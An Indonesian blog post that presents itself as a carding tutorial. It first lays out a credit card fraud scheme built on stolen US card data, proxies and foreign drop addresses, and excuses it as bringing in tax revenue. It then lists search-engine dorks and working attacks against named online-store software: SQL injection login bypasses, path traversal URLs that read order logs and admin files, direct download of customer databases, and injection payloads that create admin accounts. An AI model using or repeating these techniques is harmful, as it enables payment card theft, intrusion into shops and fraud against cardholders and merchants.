want to advertise here $100 / views

Mar 18, 2009

Carder

Carding Tutorial serta Bug online store, ini sebuah artikel

By addrsinfo
Carding adalah awalnya sebuah teknik penipuan yang melibatkan kartu kredit, dan sampai sekarang Carding kejahatan internet yang paling fenomenal,carding adalah seni atau bentuk lain dari teknik penipuan murni. yang melibatkan fasilitas IT, khuususnya internet. carding bisa sangat sulit dibasmi dan sangat sulit di hancurkan, tetapi itu bisa. carding yang teroganisir akan melibatkan banyak fihak yang terlibat, sehingga tidak mudah untuk di dilacak, berikut teknik carding yang paling lazim terjadi :
Mr. Bejo ( pelaku carding di indonesia)
Mr. Benjamin ( drop place / drop site di luar negeri, sebut saja cina atau jepang)
alat yang biasa di gunakan oleh Mr.A adalah ( proxy, dan data CC atau kartu kredit, anggap saja data USA )
dalam hal ini Mr. bejo dan mr.benjamin biasanya adalah temen yang didapat dari chatting, yang mempunyai ikatan saling ketergantungan lewat bisnis semata, mereka biasanya tidak saling kenal.(bisnis ini berlangsung, kareana bisanya mereka terikat keuntungan 50-50)
praktek carding terjadi biasannya dilakukan Mr.bejo dengan sangat matang dan terencana:
kira-kira akan seperti berikut ini prakteknya :
MR.bjodengan data kartu kredit orang amerika akan menjadi siempunya kartukredit itu, dia dengan fasilitas internet akan menyamar menjadi orang amerika itu dengan menggunakan Proxy ( merubah IP addressnya)
jadi ketika dia membeli membeli barang misalnya 2 biji handhone dari toko yang di australia si Mr.bejo ini telah menjadi berada di amerika, ya dengan menggunakan proxy, posisi mr.bejo seakan-akan ada di amerika. itu akan membuat simpunya toko di australia menjadi yakin bahwa dia adalah yang punya data kartu kredit asli (dan terkadang pula, yang punya toko tidak tahu menahu urusan transaksi, karena sebagian toko ada yang di handle 100% oleh merchant, jadi bila merchant sudah approve, toko mengirimkannya) dikirim kemana? jawabnya ke Mr.benjamin dan dari 2 HP tadi maka 1 HP adalah milik mr.bejo yang dikirim ke indonesia.
selain lewat toko biasanya para carder bekerja arena lelang barang (auction), yaitu menipu lewat orang perorangan, sehingga barang bukti akan semakin sedikit,
lalu kita akan mereview apa yang telah terjadi :
- uang orang amerika akan hilang (tapi mungkin akan diganti oleh asuransi bank)
- 2 HP sitoko australia akan hilang ( rugi 100%)
- Mr. B dapat 1 HP
- Mr. A dapat 1 HP
negara yang terlibat :
- Amerika
- Australia
- Indonesia
- Cina
biasanya negara seperti amerika atau australia tidak bisa berkutik untuk interpensi ke negara2 seperti cina atau jepang. makanya pengusutan selalu kandas, dan untuk uang sejumlah 10 - 20 juta melibatkan 4 negara akan sangat sulit sekali di realisasikan penyelesaiannya
kembali ke Mr. bejo setelah mereka mendapatkan HP, ada hal yang selalu menjadi alasan klasik tapi lugu,
kenapa negara ikut kasuk kusus membasmi anak bangsanya yang pahlawan pajak?
betul itu yang selalu jadi cerita …
dari 1 Hp bilanglah negara dapat 200rb, kalikan itu bila 1000 HP dari sekian carder. bukan kan itu pemasukan negara? memeng itu alasan klasik.
dan selain itu dengan sistem seperti diatas, barang sudah 100% bersih karena rantai carding pada dasarnya terputus sampai di china tadi. da indonesia justru tidak terlibat sama - sekali
Contoh - Contoh kelemahan pada online store yang sering dimanfaatkan para penjahat
contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik google.com :–> allinurl:/shopadmin.asp
Contoh target : www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : ‘or’1
pass : ‘or’1
contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/store/index.cgi/page=
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Hapus short_blue.htm dan ganti dengan –> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/order.log
contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com allinurl:/metacart/
Contoh target : www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan –> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb
contoh bugs pada bentuk toko sistem :D CShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/DCShop/
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan –> /DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt
contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/shop/category.asp/catid=
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan –> /admin/dbsetup.asp
Hasilnya : www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)
contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik –> allinurl:/commercesql/
Contoh : www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan –>
cgi-bin/commercesql/index.cgi?page=
Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya –>
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
contoh bugs pada bentuk toko sistem : EShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google: Ketik –> allinurl:/eshop/
Contoh : www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan –> /cg-bin/eshop/database/order.mdb
Hasilnya : www.xxxxxx.com/…/cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)
contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com: Ketik –> allinurl:/cart32.exe/
Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan –> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
http://www.xxxxx.com/cart32/
Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/c…URNS-001065.c32
contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0 teknik/jalan ke dua
google.com Ketik –> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
Contoh :
http://xxxxxxx.com/vpasp/shopdisplayproduc…elect%20fldauto,
fldpassword%20from%20tbluser%20where%20fldusername=
‘admin’%20and%20fldpassword%20like%20′a%25′–
Gantilah nilai dari string url terakhir dg:
%20′a%25′–
%20′b%25′–
%20′c%25′–
Kalau berhasil, kita akan mendapatkan informasi username dan password admin
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya
contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6
Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp
contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com Ketik –> allinurl: Lobby.asp
Contoh : www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan –> fpdb/shop.mdb
Hasilnya : www.xxxxx.com/fpdb/shop.mdb
contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik –> allinurl: /cgi-local/shopper.cgi
Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan –> …&template=order.log
Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=…&template=order.log
contoh bugs pada bentuk toko sistem :P roddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik –> allinurl:proddetail.asp?prod=
Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan –> fpdb/vsproducts.mdb
Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb
contoh bugs pada bentuk toko sistem :D igishop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google Ketik –> inurl:”/cart.php?m=”
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan –>admin
Hasilnya http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection
Usename : ‘or”=”
Password : ‘or”=”

Artikel Terkait

0komentar:

Post a Comment